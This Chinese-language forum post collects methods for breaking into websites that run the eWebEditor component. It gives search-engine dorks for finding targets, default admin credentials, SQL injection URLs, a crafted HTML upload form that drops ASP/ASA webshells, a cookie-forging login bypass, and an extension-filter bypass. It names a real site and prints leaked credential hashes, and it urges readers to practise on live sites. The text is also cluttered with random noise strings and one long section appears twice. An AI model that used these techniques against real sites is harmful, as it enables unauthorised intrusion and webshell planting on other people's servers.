eWebEditor.asp?id=45&style=standard1 样式调用
; l) L- m, H4 x
" p; S% h/ R3 _. C
5 ^; y3 |! j X) _: a/edit/admin_uploadfile.asp?id=14&dir=../../..
; b( t( W0 i4 i可以浏览网站目录 ../自己加或者减
9 ?' Y* ?7 }) b! j, N, }
( c) c' f7 o% m# R有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞/ x# K) i! O- X% l+ \& a% e: J2 o
简单利用就是
) o4 X6 I- s$ u! d0 ?# A; Mhttp://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200( g# z4 O) U' z$ _& T
http://www.siqinci.com/ewebedito ... amp;style=full_v200% T5 x2 p4 D- ?
可以利用nbsi进行猜解,对此进行注入) r5 H9 b% n) b" g+ Z/ O- Y
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的6 h, K7 d1 n' S3 @0 o! m l
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:- z* q+ |/ i& k0 @0 h, f3 m! L
在action下面6 z5 J1 F! `' E
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">( B5 h$ a% {# g k! Y0 i; G
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">! i; r/ n# N @' S
<input type="submit" name="uploadfile" value="提交">
) a8 F$ T. U' A0 x. ^<input type=hidden name=originalfile value="">
/ A$ [9 c5 E: E! P9 O( x</form>, C5 k: g7 i" e4 Z, n: Q3 N
------------------------------------------------------------------------------------------------------------------------------------------------3 Q; X! g" K( G! I
<input type="submit" name="uploadfile" value="提交"> 放在action后头
) B1 R" ~4 h0 l/ |" q# `; d# P,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
o% G( O0 S/ b/ p3 \
$ G: x/ w, \ e( d/ I
& Z5 N% x% D& N& g
" N6 H9 y1 d6 g% v. o: g9 ^8 \5 Y; R! W8 e8 g/ W6 G
Ewebeditor最新漏洞及漏洞大全[收集] (图)
5 s; T% M. F# _) x2 `! C" V本帖最后由 administrator 于 2009-7-7 21:24 编辑1 j: c# [3 |( a4 H. U2 r
9 A9 L0 {# Z5 |6 l1 Q% _5 A: c
以下文章收集转载于网络( R3 Q7 T2 C7 i; F
#主题描述# ewebeditor 3.8漏洞[php]( X' C# n# D/ v$ ?/ |* o
--------------------------------------------------------------------------------------------% W5 N( k3 y0 q: H7 l
#内容#2 [! f N9 Q% c
php版ewebeditor 3.8的漏洞
: C: {+ P6 y4 ?php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
- \% n$ _6 g# d$ l7 a1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,4 p: ?$ c" {, K1 f
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
7 o) V, u y& J6 T( u3 后面的利用和asp一样,新增样式修改上传,就ok了* f) S/ x+ u2 f: F6 w
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
$ |6 d! Q/ @/ h; b2 i- m( vaspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell) L6 c* R. a/ D2 C6 f5 t; B
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
8 u: p& v& {- H9 x: N1 d--------------------------------------------------------------------------------------------5 q% \1 V4 ?3 e- h) Y3 U+ M
/ i U6 ]0 B9 z; c3 D5 d$ O1 f. h+ ^5 u
7 V8 X+ ?! v0 x+ r! e A7 N) Y算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
1 l ~: j; N, X9 K# D# e ~3 X6 ]' R' ^; ~9 r, c
漏洞更新日期TM: 2009 2 9日 转自zake’S Blog H1 K/ B2 \2 ^+ c
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
& x6 _: t9 P2 v8 R那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址" l1 ?4 Q' N+ H$ X; J, k) r/ O
1 e4 F% P' \6 I% J( R4 h/ ?- k
# }6 U9 T7 i0 R, \& D7 `, q然后确定以后,这里是最关键的一部!
' h+ p* m# {* R& T- |0 U这里点了远程上传以后,再提交得到木马地址
1 c+ R; E" Y+ y) @) z" a/ P由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限/ D/ Q1 w% C! Z; F1 `% |
属于安全检测漏洞版本ewebeditor v6.0.0
; X$ u% K! }, \# \0 ]' r' t3 ~, M I0 h- s$ W k, n3 c
以前的ewebeditor漏洞:$ g2 {3 O. @8 Z' ]9 Y' O& I
% O# y- B& r1 @6 ~3 G! T7 Z
ewebeditor注入漏洞, [, p7 R7 I" r1 p" j3 Y
, z3 ~, w2 k. E9 c大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb8 `2 x5 N& d+ B) Q0 X+ M6 _
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
1 `7 C7 A' T& Q今天我给大家带来的也是ewebeditor编辑器的入侵方法
; j6 o# ?& X4 q+ x0 z) S不过一种是注入,一种是利用upload.asp文件,本地构造
) }1 k/ U" j+ K7 @% a( g$ }NO1:注入
7 ?, Q$ u4 E4 D6 v$ phttp://www.XXX.com/ewebeditor200 ... amp;style=full_v200
- D: P$ a% n( Y! k6 N8 A% ~编辑器ewebedior7以前版本通通存在注入. N$ W# a: l5 _" k% n! i5 {0 l+ p
直接检测不行的,要写入特征字符0 Z, b# C H8 Y8 U' Z) V; O
我们的工具是不知道ewebeditor的表名的还有列名
3 K7 [ P3 h4 T4 @3 Z. `我们自己去看看
4 E P4 _3 Y: H2 O' h, A z哎。。先表吧
+ ~5 ~) G/ X2 J9 q$ C要先添加进库
' I; e. k# x; Q' ^; X8 h开始猜账号密码了
+ \( `: D1 P8 o% i" F' h3 W9 _我们==
$ U; A3 g- ~/ b `% w, g心急的往后拉! T# Z. X& ~- o/ B; K0 }: h7 p
出来了. Q0 S6 v: J0 C/ Y& i6 M
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120
; r- [- g8 R0 g, ` H* y" W0 g对吧^_^
0 G5 u5 G& i0 L: I后面不说了8 n* J5 [/ A- U; P5 |0 d9 Y' |4 R
NO2:利用upload.asp文件,本地构造上传shell/ P1 [" K! y4 \6 m D1 m+ t
大家看这里
( U% | V, I2 h( S8 O" Hhttp://www.siqinci.com/ewebedito ... lepreview&id=37- _( {' a, X1 c& {; [8 S
如果遇见这样的情况又无法添加工具栏是不是很郁闷* x3 e, O& p+ q5 o: f
现在不郁闷了,^_^源源不一般
" Z) o! [0 l" S6 E8 N我们记录下他的样式名“aaa” _9 l, t3 K. q4 U" k8 j$ e2 y' x' B
我已经吧upload.asp文件拿出来了( T5 \* L, G: v
我们构造下
" w8 @2 n5 M# ^0 pOK,我之前已经构造好了- q8 u- R# Z7 {/ }' E
其实就是这里
3 j) B# H/ N5 t; ?5 |7 V<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>
4 M5 `5 x( x% ~0 }( W' `- v1 j* C<input type=file name=uploadfile size=1 style=”width:100%”>
- q& U* S* R9 D9 V) @- q5 N<input type=submit value=”上传了”></input>
b" ]1 E0 z& g5 b4 N</form>/ D3 w9 _* e: J/ s+ j6 ^
下面我们运行他上传个大马算了
" q% T0 t& ^& A2 @" GUploadFile上传进去的在这个目录下
7 i, F" }" T$ ]2 q# c& ]0 \2008102018020762.asa
) l& J+ {7 c. `6 n G2 y: N. f, z5 W! i% \( f' A4 d
过往漏洞:
8 \' P2 A5 C8 J. e; m) t! k' Q2 U- B# a1 z' U
首先介绍编辑器的一些默认特征:
. g9 F+ j& x4 v; i9 t3 E默认登陆admin_login.asp
) \( N* W' c* t( M, V5 A- L' D默认数据库db/ewebeditor.mdb4 j3 ~0 M: ^# _0 L
默认帐号admin 密码admin或admin888+ T0 \/ J, s+ {! q1 v! E* f5 i% t# Z
搜索关键字:”inurl:ewebeditor” 关键字十分重要/ H o1 k) z! g% ]* I* a5 r
有人搜索”eWebEditor - eWebSoft在线编辑器”
* P3 v0 B+ f4 R, Y- ^根本搜索不到几个~
+ o. l, e' r3 T! d5 hbaidu.google搜索inurl:ewebeditor
2 Q2 u6 W" C: R) k7 n几万的站起码有几千个是具有默认特征的~
. z3 @( `; l4 Q# X5 s2 s7 Q! n3 I那么试一下默认后台. \! h+ t6 ]( e- K" [- |1 T: F
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp; x4 t4 N9 @ |" P. X. e$ h
试默认帐号密码登陆。
4 N6 A+ a% Z6 e; N) Y利用eWebEditor获得WebShell的步骤大致如下:
$ p/ r& f7 l/ t1 i/ [' N1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
, {, m" Z2 _1 x2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
- d* g; D8 `, q3 H9 C/ C3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
% X; a; B$ j! q6 ~3 d {如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
k2 N5 N: m& s/ C4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。; o! m& g/ M' a6 J* f
然后在上传的文件类型中增加“asa”类型。
5 D* t D- f4 C( T6 C( ~+ g5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。* \7 ?: o% `& C) ~4 w5 g7 V
漏洞原理2 v h7 T4 i/ {4 c% _
漏洞的利用原理很简单,请看Upload.asp文件:
1 w: e; Y2 P) j! v任何情况下都不允许上传asp脚本文件8 T0 g$ O& H# f8 K
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)+ ~7 e: L8 Z# A7 i! x( O9 u1 N2 l
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
* Q# }4 X- t) \高级应用7 P4 P& s9 Z. C% Q' z
eWebEditor的漏洞利用还有一些技巧:
2 P4 s C3 t( R+ i2 Q& w% ]+ y# f1.使用默认用户名和密码无法登录。
7 O6 i& D7 i' I& @请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。# n2 i; b5 T! R; P( x# \
2.加了asa类型后发现还是无法上传。( F h+ h5 h) o
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:6 [3 d& A. Z6 [
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)$ r0 r8 t; n- L' h! i# N* d
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。7 ]% ^) e" X' q! @
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
) K; w T1 C2 Z0 {7 W呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。/ K D3 H4 g& `) y4 ?: t) q
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
) H/ D/ B* n4 e0 ^5 D3 z; Y看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
* d8 n- _5 Q" G, K% n后记1 M# W! O/ y3 y5 L9 T
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
9 ?* j) n. U1 ~; n# v基本入侵基础漏洞
$ R! C) H, r$ M1 F* meWebEditor 漏洞
8 i& M+ D/ }7 P; x% {( _2 K9 s, }! I! K2 l2 l' u
各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! 6 J. u7 B/ Z" Z8 x! s v
+ Y& H7 D1 K/ |$ N* ]0 W# b: Q漏洞利用
: K% B& s H$ ^# z利用eWebEditor获得WebShell的步骤大致如下:4 T+ n% a* \4 i0 p( Y9 \# v1 l) q
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
9 X8 G7 q( m5 ~2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。* N" }& E" i2 d/ z( [
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。& g7 y+ e# ]% }: s* k! y! c
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
) D- `6 |+ D& p o; Y( g4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。" F) X: Q- f) [3 w: y
8 ?$ u+ R4 ^; d9 k8 d
然后在上传的文件类型中增加“asa”类型。5 q z1 F a, \# z& W' ]% v8 @
: I% f# n/ S4 e# ]1 K2 @7 u5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
! x! g' u! w' V5 @9 N
5 ^) D% D( U3 U$ b
1 T7 S6 u9 l( J+ [' n7 U( o漏洞原理% b. w2 u1 p7 s' O7 x% y1 b4 h
漏洞的利用原理很简单,请看Upload.asp文件:
7 E5 |. A1 J6 n6 f: Z任何情况下都不允许上传asp脚本文件
5 m4 F& {5 \" g3 R3 PsAllowExt = replace(UCase(sAllowExt), "ASP", "")/ u- d$ \- x& V9 {! e
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!4 x+ d* {3 A {" ^9 Q: G* x
" T* L+ }. O& F4 N% ?, L( K. T
高级应用+ a' s! E! V. k) X2 S
eWebEditor的漏洞利用还有一些技巧:
( i" {. j8 f' R% b) ]1.使用默认用户名和密码无法登录。, F8 p, U' v6 n8 w Q
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。
# T3 h# M; N, |- z7 o# [. B" _; u+ m2.加了asa类型后发现还是无法上传。- A8 T* }; w7 F
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
% W- Z5 { U MsAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
, Z% n9 \# y/ [" X" T5 h猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
3 J7 t( d9 [3 b- g" b- h" w3.上传了asp文件后,却发现该目录没有运行脚本的权限。+ {& |: b `0 v9 T0 W3 V/ y
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
) q6 U; g' b, L/ i( }! T; B" h4.已经使用了第2点中的方法,但是asp类型还是无法上传。7 J- Y4 D0 n3 e5 g3 y& d
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
3 f) z& q# k0 `7 o* {# e
2 {+ G3 z4 z8 ^4 b% S* l后记* X. ]; A* r* i" g, G
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
支持
反对